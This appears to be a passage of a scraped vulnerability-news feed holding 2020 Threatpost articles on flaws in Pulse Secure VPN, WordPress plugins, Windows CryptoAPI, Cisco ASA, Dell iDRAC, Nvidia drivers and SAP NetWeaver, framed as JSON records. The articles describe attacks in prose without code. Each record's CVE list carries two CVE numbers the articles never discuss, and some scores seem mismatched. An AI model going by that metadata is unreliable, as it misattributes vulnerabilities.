", "cvss3": {}, "published": "2020-03-09T18:01:41", "type": "threatpost", "title": "Microsoft Exchange Server Flaw Exploited in APT Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-03-09T18:01:41", "id": "THREATPOST:F54F8338674294DE3D323ED03140CB71", "href": "https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:21:11", "description": "The Department of Homeland Security (DHS) is urging companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, after several cyberattacks targeted companies that had previously patched a related flaw in the VPN.\n\nDHS warns that the Pulse Secure VPN patches may have come too late. Government officials say that before the patches were deployed, bad actors were able to compromise Active Directory accounts. So even those who have patched for the bug could still be compromised and are vulnerable to attack.\n\nAt the heart of the advisory is a known, critical Pulse Secure [arbitrary file reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers to gain access to a victim\u2019s networks. Tracked as CVE-2019-11510, the bug was patched by Pulse Secure in April 2019, and many companies impacted by the flaw have applied the fix since then.\n\nBut in many cases the damage is already done.
Attackers have already exploited the flaw to snatch up victims\u2019 credentials \u2013 and now are using those credentials to move laterally through organizations, DHS\u2019 Cybersecurity and Infrastructure Security Agency (CISA) warned in the Thursday alert.\n\n\u201cCISA strongly urges organizations that have not yet done so to upgrade their Pulse Secure VPN to the corresponding patches for CVE-2019-11510,\u201d according to [CISA\u2019s alert](<https://www.us-cert.gov/ncas/alerts/aa20-107a>). \u201cIf\u2014after applying the detection measures in this alert\u2014organizations detect evidence of CVE-2019-11510 exploitation, CISA recommends changing passwords for all Active Directory accounts, including administrators and services accounts.\u201d\n\nThe flaw exists in Pulse Connect Secure, Pulse Secure\u2019s SSL VPN (virtual private network) platform used by various enterprises and organizations. Exploitation of the vulnerability is simple, which is why it received a 10 out of 10 CVSS ranking. Attackers can exploit the flaw to get initial access on the VPN server, where they\u2019re able to access credentials. A proof of concept (PoC) [was made public](<https://www.tenable.com/blog/cve-2019-11510-proof-of-concept-available-for-arbitrary-file-disclosure-in-pulse-connect-secure>) in August 2019. During that time, Troy Mursch with Bad Packets identified [over 14,500 Pulse Secure VPN endpoints that were vulnerable](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) to this flaw. In a more recent scan, [on Jan. 3, 2020](<https://twitter.com/bad_packets/status/1213273678525296640>), Mursch said 3,825 endpoints remain vulnerable.\n\nOne such vulnerable organization was Travelex, which took several months to patch critical vulnerabilities in its seven Pulse Secure VPN servers, according to Bad Packets.
Some have speculated the [lag time in patching](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) these VPNs led to the eventual [massive ransomware](<https://threatpost.com/travelex-knocked-offline-malware-attack/151522/>) attack against Travelex.\n\nVarious other cybercriminals have targeted the Pulse Secure VPN flaw to compromise organizations, such as Iranian state-sponsored hackers who leveraged the flaw to [conduct cyber-espionage campaigns](<https://www.clearskysec.com/fox-kitten/>) against dozens of companies in Israel.\n\nIn addition to urging organizations to update credentials on accounts in Active Directory, which is the database that keeps track of all of an organization\u2019s user accounts and passwords, CISA has also [released a new tool](<https://github.com/cisagov/check-your-pulse>) to help network admins sniff out any indicators of compromise on their systems that are related to the flaw.\n\n\u201cCISA encourages network administrators to remain aware of the ramifications of exploitation of CVE-2019-11510 and to apply the detection measures and mitigations provided in this report to secure networks against these attacks,\u201d the advisory said.\n
", "cvss3": {}, "published": "2020-04-17T20:56:34", "type": "threatpost", "title": "DHS Urges Pulse Secure VPN Users To Update Passwords", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-04-17T20:56:34", "id": "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "href": "https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:16:07", "description": "Researchers are warning of a critical vulnerability in a WordPress plugin called Comments \u2013 wpDiscuz, which is installed on more than 70,000 websites. The flaw gives unauthenticated attackers the ability to upload arbitrary files (including PHP files) and ultimately execute remote code on vulnerable website servers.\n\nComments \u2013 wpDiscuz enables WordPress websites to add custom comment forms and fields to sites, and serves as an alternative to services like Disqus. Researchers with Wordfence, who discovered the flaw, have notified [the plugin\u2019s developer](<https://wordpress.org/plugins/wpdiscuz/>), gVectors, which issued a patch on July 23.\n\nWith a CVSS score of 10 out of 10, the glitch is considered critical in severity, and researchers are urging website administrators to ensure that they update.\n\n\u201cThis vulnerability was introduced in the plugin\u2019s latest major version update,\u201d said Wordfence researchers [in a Tuesday post](<https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/>).
“This is considered a critical security issue that could lead to remote code execution on a vulnerable site’s server. If you are running any version from 7.0.0 to 7.0.4 of this plugin, we highly recommend updating to the patched version, 7.0.5, immediately.”

Threatpost has reached out to gVectors for further comment.

## **The Flaw**

In the latest overhaul of the plugin (versions 7.x.x), its developers added a feature that gives users the ability to include image attachments in comments that are uploaded to a website.

However, the implementation of this feature lacked security protections vetting file attachments in the comments to make sure they actually are image files, versus another type of file.

This lack of verification could allow an unauthenticated user to upload any type of file, including PHP files. To pass the file content-verification check, an attacker would simply need to add an image to make any file look like the allowed file type.

After uploading a file, the file-path location is returned as part of the request’s response, allowing the attacker to easily find the file’s location and access it. This means that attackers could upload arbitrary PHP files and then access those files to trigger their execution on the server, achieving remote code execution, said researchers.

“If exploited, this vulnerability could allow an attacker to execute commands on your server and traverse your hosting account to further infect any sites hosted in the account with malicious code,” said researchers. “This would effectively give the attacker complete control over every site on your server.”

## **WordPress Plugin Bugs**

WordPress plugins continue to be plagued by vulnerabilities, which have dire consequences for websites. Earlier in July, [it was discovered that the](<https://threatpost.com/advertising-plugin-wordpress-full-site-takeovers/157283/>) Adning Advertising plugin for WordPress, a premium plugin with over 8,000 customers, contains a critical remote code-execution vulnerability with the potential to be exploited by unauthenticated attackers.

In May, Page Builder by SiteOrigin, a WordPress plugin with a million active installs that’s used to build websites via a drag-and-drop function, [was found to harbor](<https://threatpost.com/wordpress-page-builder-bugs-takeover/155659/>) two flaws that could allow full site takeover.

Meanwhile, in April it was revealed that legions of website visitors could be infected with drive-by malware, among other issues, thanks to a [CSRF bug in Real-Time Search and Replace](<https://threatpost.com/wordpress-plugin-bug-100k-websites-compromise/155230/>).

*Source: Threatpost, “Critical Security Flaw in WordPress Plugin Allows RCE,” published 2020-07-29, <https://threatpost.com/critical-rce-flaw-wordpress-plugin-on-70k-sites/157824/>. CVEs listed: CVE-2020-24400, CVE-2020-24407, CVE-2020-5135. CVSS: not scored in the record.*

A high-severity cross-site request forgery (CSRF) vulnerability in Real-Time Find and Replace, a WordPress plugin installed on more than 100,000 sites, could lead to cross-site scripting and the injection of malicious JavaScript anywhere on a victim site.

According to research from Wordfence [released on Monday](<https://www.wordfence.com/blog/2020/04/high-severity-vulnerability-patched-in-real-time-find-and-replace-plugin/>), the malicious code injection could be used to create a new administrative user account, steal session cookies, redirect users to a malicious site, obtain administrative access or infect innocent visitors browsing a compromised site with a drive-by malware attack.

Real-Time Find and Replace allows administrators to dynamically replace any HTML content on WordPress sites with new content without permanently changing the source content, right before a page is delivered to a user’s browser. Any replacement code or content executes any time a user navigates to a page that contains the original content.

“To provide this functionality, the plugin registers a sub-menu page tied to the function far_options_page with a capability requirement to ‘activate_plugins,’” explained Wordfence researcher Chloe Chamberland, in a Monday posting.
“The far_options_page function contains the core of the plugin’s functionality for adding new find-and-replace rules. Unfortunately, that function failed to use nonce verification, so the integrity of a request’s source was not verified during rule update, resulting in a CSRF vulnerability.”

Cross-site request forgery attacks (CSRF or XSRF for short) are used to send malicious requests from an authenticated user to a web application. Thus, a successful exploit of the bug does require user interaction: An attacker would need to trick a site’s administrator into clicking on a malicious link in a comment or email, according to Wordfence.

Attackers could particularly wreak havoc if they used the bug to replace the <head> HTML tag with malicious JavaScript, she added. Because most pages contain a <head> HTML tag for the page header, one replacement would cause the malicious code to execute on every page of the affected site.

Updating to the latest version of the plugin, version 4.0.2, fixes the issue.

“In the most up to date version, a nonce has been added along with a check_admin_referer nonce verification function to ensure the legitimacy of the source of a request,” said Chamberland.

WordPress plugins continue to make headlines as weak links that can lead to website compromises. For instance, in April a pair of security vulnerabilities (one of them critical) [were found](<https://threatpost.com/critical-wordpress-plugin-bug-lock-admins-out/154354/>) in the WordPress search engine optimization (SEO) plugin known as Rank Math. They could allow remote cybercriminals to elevate privileges and install malicious redirects onto a target site, according to researchers. Rank Math is a WordPress plugin with more than 200,000 installations.

In March, a critical vulnerability in a WordPress plugin known as “ThemeREX Addons” [was found](<https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/>) that could open the door for remote code execution in 44,000 websites.

Also in March, two vulnerabilities – including a high-severity flaw – [were patched](<https://threatpost.com/wordpress-plugin-bug-popup-builder/153715/>) in a popular WordPress plugin called Popup Builder. The more severe flaw could enable an unauthenticated attacker to inject malicious JavaScript into a popup – potentially opening up more than 100,000 websites to takeover.

In February, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked. And, earlier that month, a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>). The flaw could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.

*Source: Threatpost, “WordPress Plugin Bug Opens 100K Websites to Compromise,” published 2020-04-28, <https://threatpost.com/wordpress-plugin-bug-100k-websites-compromise/155230/>. CVEs listed: CVE-2020-24400, CVE-2020-24407, CVE-2020-5135. CVSS: not scored in the record.*

Two proof-of-concept (PoC) exploits have been publicly released for the recently patched [crypto-spoofing vulnerability](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) found by the [National Security Agency](<https://threatpost.com/podcast-nsa-reports-major-crypto-spoofing-bug-to-microsoft/151900/>) and [reported to Microsoft](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>).

The vulnerability ([CVE-2020-0601](<https://nvd.nist.gov/vuln/detail/CVE-2020-0601>)) could enable an attacker to spoof a code-signing certificate (necessary for validating executable programs in Windows) in order to make it appear as though an application was from a trusted source. The flaw made headlines when it was disclosed earlier this week as part of Microsoft’s January Patch Tuesday security bulletin. It marked the first time the NSA had ever publicly reported a bug to Microsoft.

The two PoC exploits were published to GitHub on Thursday. Either could potentially allow an attacker to launch MitM (man-in-the-middle) attacks – allowing an adversary to spoof signatures for files and emails and fake signed-executable code inside programs that are launched inside Windows.
One PoC exploit was released [by Kudelski Security](<https://github.com/kudelskisecurity/chainoffools>) and the other by a security researcher [under the alias “Ollypwn”](<https://github.com/ollypwn/cve-2020-0601>).

According to [Microsoft’s advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>), the spoofing vulnerability exists in the way Windows CryptoAPI (Microsoft’s API that enables developers to secure Windows-based applications using cryptography) validates Elliptic Curve Cryptography (ECC) certificates. Kudelski Security [in a blog post](<https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc>) said they launched the PoC using a “curve P384” certificate, which uses ECC (specifically, the USERTrust ECC Certificate Authority). Researchers were able to craft a key used to sign the “curve P384” certificate with an arbitrary domain name. This certificate would subsequently be recognized by Windows’ CryptoAPI as trusted.

Another similar PoC exploit [was publicly released](<https://twitter.com/ollypwn/status/1217585156296450048>) by Denmark-based security expert “Ollypwn.”

“When Windows checks whether the certificate is trusted, it’ll see that it has been signed by our spoofed CA,” said “Ollypwn” in a [write-up of his PoC exploit](<https://github.com/ollypwn/cve-2020-0601/blob/master/README.md>). “It then looks at the spoofed CA’s public key to check against trusted CA’s. Then it simply verifies the signature of our spoofed CA with the spoofed CA’s generator – this is the issue.”

A third PoC exploit was developed by security expert Saleem Rashid, [who said on Twitter](<https://twitter.com/saleemrash1d/status/1217495681230954506?s=20>), Wednesday, that the PoC allowed him to fake TLS certificates and set up sites that look like legitimate ones. However, Rashid did not make his PoC exploit code public.

> CVE-2020-0601 [pic.twitter.com/8tJsJqvnHj](<https://t.co/8tJsJqvnHj>)
>
> — Saleem Rashid (@saleemrash1d) [January 15, 2020](<https://twitter.com/saleemrash1d/status/1217495681230954506?ref_src=twsrc%5Etfw>)

Researchers say that while the recently released PoC exploits work, they show that the flaw is not easily exploitable for attackers, particularly because victims would also need to first visit a very specific website, making a targeted attack more difficult.

“In the end, please keep in mind that such a vulnerability is not at risk of being exploited by script kiddies or ransomware,” Kudelski Security researchers said in their analysis. “While it is still a big problem because it could have allowed a Man-in-the-Middle attack against any website, you would need to face an adversary that owns the network on which you operate, which is possible for nation-state adversaries, but less so for a script kiddie.”

[Tech support site AskWoody](<https://www.askwoody.com/2020/theres-a-working-proof-of-concept-for-the-chainoffools-cve-2020-0601-crypto-api-bug-but-it-isnt-as-bad-as-you-think/>) agreed: “There’s no question the code works — but it has a prerequisite. In order to get bitten by the security hole, you have to first visit a specific site. That site will load a security certificate that’s instrumental in making the PoC code work. That severely limits the threat, eh?”

Despite the roadblocks to exploitation, security experts say that publicly released PoC exploits can pave the way for future exploitation of CVE-2020-0601 by adversaries. Researchers urge Microsoft customers to make sure that their systems are up to date.

“Assume that this vulnerability has already been weaponized, probably by criminals and certainly by major governments,” Bruce Schneier said in a [Wednesday analysis](<https://www.schneier.com/blog/archives/2020/01/critical_window.html>). “Even assume that the NSA is using this vulnerability — why wouldn’t it?”

*Source: Threatpost, “PoC Exploits Published For Microsoft Crypto Bug,” published 2020-01-16, <https://threatpost.com/poc-exploits-published-for-microsoft-crypto-bug/151931/>. CVEs listed: CVE-2020-0601, CVE-2020-24400, CVE-2020-24407. CVSS 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N).*

Cisco is warning that a high-severity flaw in its network security software is being actively exploited – allowing remote, unauthenticated attackers to access sensitive data.

Patches for the vulnerability ([CVE-2020-3452](<https://nvd.nist.gov/vuln/detail/CVE-2020-3452>)) in question, which ranks 7.5 out of 10 on the CVSS scale, were [released last Wednesday](<https://threatpost.com/network-security-cisco-flaw-leaks-sensitive-data/157691/>).
However, attackers have since been targeting vulnerable versions of the software where the patches have not yet been applied.

“The Cisco Product Security Incident Response Team (PSIRT) is aware of the existence of public exploit code and active exploitation of the vulnerability that is described in this advisory,” according to Cisco.

The flaw specifically exists in the web services interface of Firepower Threat Defense (FTD) software, which is part of Cisco’s suite of network security and traffic management products, and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network security devices.

The potential threat surface is vast: [Researchers with Rapid7](<https://blog.rapid7.com/2020/07/23/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability-what-you-need-to-know/>) recently found 85,000 internet-accessible ASA/FTD devices. Worse, 398 of those are spread across 17 percent of the Fortune 500, researchers said.

The flaw stems from a lack of proper input validation of URLs in HTTP requests processed by affected devices. Specifically, the flaw allows attackers to conduct directory traversal attacks, an HTTP attack enabling bad actors to access restricted directories and execute commands outside of the web server’s root directory.

Soon after patches were released, proof-of-concept (PoC) exploit code was [released Wednesday](<https://twitter.com/aboul3la>) for the flaw by security researcher Ahmed Aboul-Ela.

A potential attacker can view more sensitive files within the web services file system: The web services files may have information such as WebVPN configuration, bookmarks, web cookies, partial web content and HTTP URLs.

> There’s a proof of concept doing the rounds for directory path traversal (yes, it’s 1998 again) in Cisco AnyConnect SSL VPN.
>
> It’s already being mass spammed across internet.
>
> As far as I can see people can only read LUA source files so far, so not terribly problematic as is. <https://t.co/kSIFQdz1go>
>
> — Kevin Beaumont (@GossiTheDog) [July 24, 2020](<https://twitter.com/GossiTheDog/status/1286614404054880256?ref_src=twsrc%5Etfw>)

Cisco said the vulnerability affects products if they are running a vulnerable release of Cisco ASA Software or Cisco FTD Software, with a vulnerable AnyConnect or WebVPN configuration: “The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features,” according to its advisory. However, “this vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.”

[Image: Rapid7 chart of patch status for internet-facing Cisco ASA/FTD devices](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/07/27115136/cisco-vulnerability-patch.png>)

Credit: Rapid7

Researchers with Rapid7 say that since the patch was issued, only about 10 percent of Cisco ASA/FTD devices detected as internet-facing have been rebooted – which is a “likely indicator they’ve been patched.” Only 27 of the 398 detected in Fortune 500 companies appear to have been rebooted.

Researchers encourage immediate patching of vulnerable ASA/FTD installations “to prevent attackers from obtaining sensitive information from these devices which may be used in targeted attacks.”

“Cisco has provided fixes for all supported versions of ASA and FTD components,” said researchers. “Cisco ASA Software releases 9.5 and earlier, as well as Release 9.7, along with Cisco FTD Release 6.2.2 have reached the end of software maintenance and organizations will have to upgrade to a later, supported version to fix this vulnerability.”

*Source: Threatpost, “Attackers Exploiting High-Severity Network Security Flaw, Cisco Warns,” published 2020-07-27, <https://threatpost.com/attackers-exploiting-high-severity-network-security-flaw-cisco-warns/157756/>. CVEs listed: CVE-2020-24400, CVE-2020-24407, CVE-2020-3452. CVSS 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N).*

Researchers have disclosed details of a recently patched, high-severity Dell PowerEdge server flaw, which if exploited could allow an attacker to fully take over and control server operations.

The web vulnerability was found in the Dell EMC iDRAC remote access controller, technology embedded within the latest versions of Dell PowerEdge servers.
While the vulnerability was fixed earlier in July, Georgy Kiguradze and Mark Ermolov, the researchers with Positive Technologies who discovered the flaw, published a detailed analysis on Tuesday.

The path traversal vulnerability ([CVE-2020-5366](<https://www.dell.com/support/article/en-us/sln322125/dsa-2020-128-idrac-local-file-inclusion-vulnerability?lang=en>)), found in Dell EMC iDRAC9 versions prior to 4.20.20.20, is rated 7.1 in terms of exploitability, giving it a high-severity vulnerability rating, according to [an advisory](<https://www.dell.com/support/article/pt-pt/sln322125/dsa-2020-128-idrac-local-file-inclusion-vulnerability?lang=en>) published online by Dell.

Path traversal is one of the three most common vulnerabilities that researchers said they come across in their investigations. If exploited, the flaw can allow attackers to view the content of server folders that should not be accessible even to someone who’s logged in as an ordinary site user. iDRAC runs on Linux, and the specific appeal to hackers in exploiting the vulnerability would be the ability to read the file /etc/passwd, which stores information about Linux users, the researchers said.

An example of how this can be used by attackers is a recent attack on [two vulnerabilities](<https://www.forbes.com/sites/kateoflahertyuk/2020/06/04/zoom-users-beware-here-are-two-critical-reasons-to-update-your-app/#461dbfdd1767>) found in the Zoom video conferencing app that could allow remote attackers to breach the system of any participant in a group call. Indeed, a remote, authenticated malicious user with low privileges could potentially exploit the iDRAC flaw by manipulating input parameters to gain unauthorized read access to arbitrary files, Dell EMC warned in its advisory.

iDRAC is designed to allow IT administrators to remotely deploy, update, monitor and maintain Dell servers without installing new software. Dell has already released an update to the iDRAC firmware that fixes the flaw and recommends customers update as soon as possible.

The vulnerability can only be exploited if iDRAC is connected to the internet, which Dell EMC does not recommend, researchers said. iDRAC also is a relatively new technology in Dell EMC servers, which means it may not be widely used yet.

Still, researchers said that public search engines already discovered several internet-accessible connections to iDRAC that could be exploited, as well as 500 controllers available for access using SNMP.

The iDRAC controller is used by network administrators to manage key servers, “effectively functioning as a separate computer inside the server itself,” Kiguradze explained in a press statement.

“iDRAC runs on ordinary Linux, although in a limited configuration, and has a fully-fledged file system,” he said. “The vulnerability makes it possible to read any file in the controller’s operating system, and in some cases, to interfere with operation of the controller – for instance during reading symbolic Linux devices like /dev/urandom.”

Attackers can exploit the flaw externally by obtaining the back-up of a privileged user or if they have credentials or brute-force their way in, Kiguradze said. They also could use the account of a junior administrator with limited server access to exploit the flaw internally, he said. Once an attacker gains control, he or she can externally block or disrupt the server’s operation.

To better secure Dell servers that use iDRAC, researchers recommended that customers place iDRAC on a separate administration network and not connect the controller to the internet. Companies also should isolate the administration network or VLAN (such as with a firewall) and restrict access to the subnet or VLAN to authorized server administrators only.

Other recommendations by Dell EMC to secure iDRAC against intrusion include using 256-bit encryption and TLS 1.2 or later; configuration options such as IP address range filtering and system lockdown mode; and additional authentication such as Microsoft Active Directory or LDAP.

*Source: Threatpost, “Researchers Warn of High-Severity Dell PowerEdge Server Flaw,” published 2020-07-28, <https://threatpost.com/researchers-warn-of-high-severity-dell-poweredge-server-flaw/157795/>. CVEs listed: CVE-2020-24400, CVE-2020-24407, CVE-2020-5366. CVSS 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N).*

Graphics chipmaker Nvidia has fixed two high-severity flaws in its graphics drivers.
Attackers can exploit the vulnerabilities to view sensitive data, gain escalated privileges or launch denial-of-service (DoS) attacks on impacted Windows gaming devices.

Nvidia’s graphics driver (also known as the GPU Display Driver) for Windows is used in devices targeted at enthusiast gamers; it’s the software component that enables the device’s operating system and programs to use its high-level, gaming-optimized graphics hardware.

One of the vulnerabilities, CVE-2020-5962, exists in the Nvidia Control Panel component, which provides control of the graphics driver settings as well as other utilities installed on the system. The flaw could allow an attacker with local system access to corrupt a system file, which may lead to DoS or escalation of privileges, according to Nvidia’s [Wednesday security advisory](<https://nvidia.custhelp.com/app/answers/detail/a_id/5031>).

Another vulnerability (CVE-2020-5963) exists in the CUDA Driver, a computing platform and programming model invented by Nvidia. The issue stems from improper access control in the driver’s Inter Process Communication APIs. It could lead to code execution, DoS or information disclosure.

The display driver also contains four medium-severity flaws, in the service host component (CVE-2020-5964), the DirectX 11 user mode driver (CVE-2020-5965), the kernel mode layer (CVE-2020-5966) and the UVM driver (CVE-2020-5967).

Various drivers are affected for Windows and Linux users, including ones that use Nvidia’s GeForce, Quadro and Tesla software. A full list of affected – and updated – versions is below.

[Image: table of affected and updated Nvidia driver versions](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/06/25101158/nvidia-patches.png>)

Nvidia also stomped out four high-severity flaws in its Virtual GPU (vGPU) manager, its tool that enables multiple virtual machines to have simultaneous, direct access to a single physical GPU, while also using Nvidia graphics drivers deployed on non-virtualized operating systems.

In this case, the software does not restrict (or incorrectly restricts) operations within the boundaries of a resource that could be accessed by using an index or pointer, such as memory or files. That may lead to code execution, DoS, escalation of privileges or information disclosure (CVE-2020-5968), warned Nvidia.

Another flaw stems from the vGPU plugin validating shared resources before using them, creating a race condition which may lead to DoS or information disclosure (CVE-2020-5969). And in another glitch, input data size is not validated in the vGPU plugin, which may lead to tampering or denial of service (CVE-2020-5970).

The final vGPU flaw (CVE-2020-5971) stems from the software reading from a buffer by using buffer access mechanisms (such as indexes or pointers) that reference memory locations after the targeted buffer. This could lead to code execution, DoS, escalated privileges or information disclosure.

It’s only the latest slew of patches that Nvidia has issued. Earlier in March, the [company fixed several high-severity vulnerabilities](<https://threatpost.com/gamer-alert-serious-nvidia-flaw-plagues-graphics-driver/153380/>) in its graphics driver, which can be exploited by a local attacker to launch DoS or code-execution attacks. Last year, Nvidia issued fixes for [high-severity flaws](<https://threatpost.com/gamers-hit-with-nvidia-gpu-driver-geforce-flaws/149992/>) in two popular gaming products, including its graphics driver for Windows and GeForce Experience. The flaws could be exploited to launch an array of malicious attacks – from DoS to escalation of privileges. Also in 2019, [Nvidia patched](<https://threatpost.com/nvidia-geforce-experience-bug/143196/>) another high-severity vulnerability in its GeForce Experience software, which could lead to code execution or DoS of products, if exploited.

*Source: Threatpost, “Nvidia Warns Windows Gamers of Serious Graphics Driver Bugs,” published 2020-06-25, <https://threatpost.com/nvidia-windows-gamers-graphics-driver-bugs/156911/>. CVEs listed: CVE-2020-24400, CVE-2020-24407, CVE-2020-5962. CVSS 4.6 (AV:L/AC:L/Au:N/C:P/I:P/A:P).*

A critical vulnerability, carrying a severity score of 10 out of 10 on the CVSS bug-severity scale, has been disclosed for SAP customers.

SAP’s widely deployed collection of enterprise resource planning (ERP) software is used to manage financials, logistics, customer-facing organizations, human resources and other business areas. As such, the systems contain plenty of sensitive information.

According to [an alert](<https://us-cert.cisa.gov/ncas/alerts/aa20-195a>) from the Department of Homeland Security, successful exploitation of the bug opens the door for attackers to read and modify financial records; change banking details; read personally identifiable information (PII); administer purchasing processes; sabotage or disrupt operations; achieve operating system command execution; and delete or modify traces, logs and other files.

The bug ([CVE-2020-6287](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287>)) has been named RECON by the Onapsis Research Labs researchers who found it, and it affects more than 40,000 SAP customers, they noted.
SAP [delivered a patch](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675>) for the issue on Tuesday as part of its July 2020 Security Note.\n\n\u201cIt stands for Remotely Exploitable Code On NetWeaver,\u201d Mariano Nunez, CEO of Onapsis, told Threatpost. \u201cThis vulnerability resides inside SAP NetWeaver Java versions 7.30 to 7.50 (the latest version as of [our analysis publication]). All Support Packages tested to date were vulnerable. SAP NetWeaver is the base layer for several SAP products and solutions.\u201d\n\nAn attacker leveraging this vulnerability will have unrestricted access to critical business information and processes in a variety of different scenarios, according to the firm.\n\n## NetWeaver Java Woes\n\nThe bug affects a default component present in every SAP application running the SAP NetWeaver Java technology stack, according to Onapsis. This technical component is used in many SAP business solutions, such as SAP S/4HANA, SAP SCM, SAP CRM, SAP Enterprise Portal, SAP Solution Manager (SolMan) and many others, the researchers said.\n\nAccording to DHS, the vulnerability is introduced due to the lack of authentication in a web component of the SAP NetWeaver AS for Java, allowing for several high-privileged activities on the SAP system. 
A remote, unauthenticated attacker can exploit this vulnerability through an HTTP interface, which is typically exposed to end users and, in many cases, exposed to the internet.\n\n\u201cIf successfully exploited, a remote, unauthenticated attacker can obtain unrestricted access to SAP systems through the creation of high-privileged users and the execution of arbitrary operating system commands with the privileges of the SAP service user account (`<sid>adm`), which has unrestricted access to the SAP database and is able to perform application maintenance activities, such as shutting down federated SAP applications,\u201d according to the alert.\n\n## Impact\n\nPut another way, an unauthenticated attacker could create a new SAP user with maximum privileges, bypassing all access and authorization controls (such as segregation of duties, identity management, and governance, risk and compliance solutions) and gaining full control of SAP systems, Nunez said.\n\n\u201cWith SAP NetWeaver Java being a fundamental base layer for several SAP products, the specific impact would vary depending on the affected system,\u201d according to Onapsis, in a [technical analysis](<https://www.onapsis.com/recon-sap-cyber-security-vulnerability>) released on Tuesday. \u201cIn particular, there are different SAP solutions running on top of NetWeaver Java which share a common particularity: they are hyper-connected through APIs and interfaces. In other words, these applications are attached to other systems, both internal and external, usually leveraging high-privileged trust relationships.\u201d\n\nAnd while this is bad enough, the RECON vulnerability\u2019s risk increases when the affected solutions are exposed to the internet, to connect companies with business partners, employees and customers. These systems \u2013 Onapsis estimates there are at least 2,500 of them \u2013 have an increased likelihood of remote attacks, researchers said. 
Out of those vulnerable installations, 33 percent are in North America, 29 percent are in Europe and 27 percent are in Asia-Pacific.\n\n\u201cBecause of the type of unrestricted access an attacker would obtain by exploiting unpatched systems, this vulnerability also may constitute a deficiency in an enterprise\u2019s IT controls for regulatory mandates\u2014potentially impacting financial (Sarbanes-Oxley) and privacy (GDPR) compliance,\u201d according to the writeup.\n\n## Patch Available\n\nSAP\u2019s patch should be applied immediately, researchers recommended. While there is no indication yet that this has been exploited, Nunez told Threatpost that SAP customers should be on high alert now that the vulnerability has been announced and the DHS has sent out its US CERT alert warning.\n\n\u201cNow that the vulnerability and patch have been released, skilled hackers can quickly develop exploit code,\u201d he said. \u201cBecause there are many vulnerable Internet exposed SAP systems, the complexity of the attack is significantly less.\u201d\n\nThat said, because of the complexity of mission-critical applications and limited maintenance windows, organizations are often challenged to rapidly apply SAP security notes, the Onapsis team acknowledged.\n\n\u201cIt\u2019s difficult to patch mission-critical applications such as those from SAP because they need to be constantly available,\u201d Nunez told Threatpost. \u201cTesting can take a long time depending upon complexity and customization of the apps. Also, there are limited maintenance windows available to apply the patches.\u201d\n\nHe added, \u201cFor SAP customers, critical vulnerabilities such as RECON highlight the need to protect mission-critical applications, by extending existing cybersecurity and compliance programs to ensure these applications are no longer in a blind spot. 
These systems are the lifeblood of the business and under the scope of strict compliance requirements, so there is simply nothing more important to secure.\u201d\n", "cvss3": {}, "published": "2020-07-14T11:45:02", "type": "threatpost", "title": "Critical SAP Bug Allows Full Enterprise System Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-6287"], "modified": "2020-07-14T11:45:02", "id": "THREATPOST:AA1F3088D813F95D476A024378F27010", "href": "https://threatpost.com/critical-sap-bug-enterprise-system-takeover/157392/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:12:04", "description": "Adobe is warning of a critical vulnerability in its Flash Player application for users on Windows, macOS, Linux and ChromeOS operating systems.\n\nThe vulnerability is [the only flaw released this month](<https://blogs.adobe.com/psirt/?p=1925>) as part of Adobe\u2019s regularly scheduled patches (markedly fewer than the 18 flaws addressed [during its September regularly scheduled fixes](<https://threatpost.com/critical-adobe-flaws-attackers-javascript-browsers/159026/>)). 
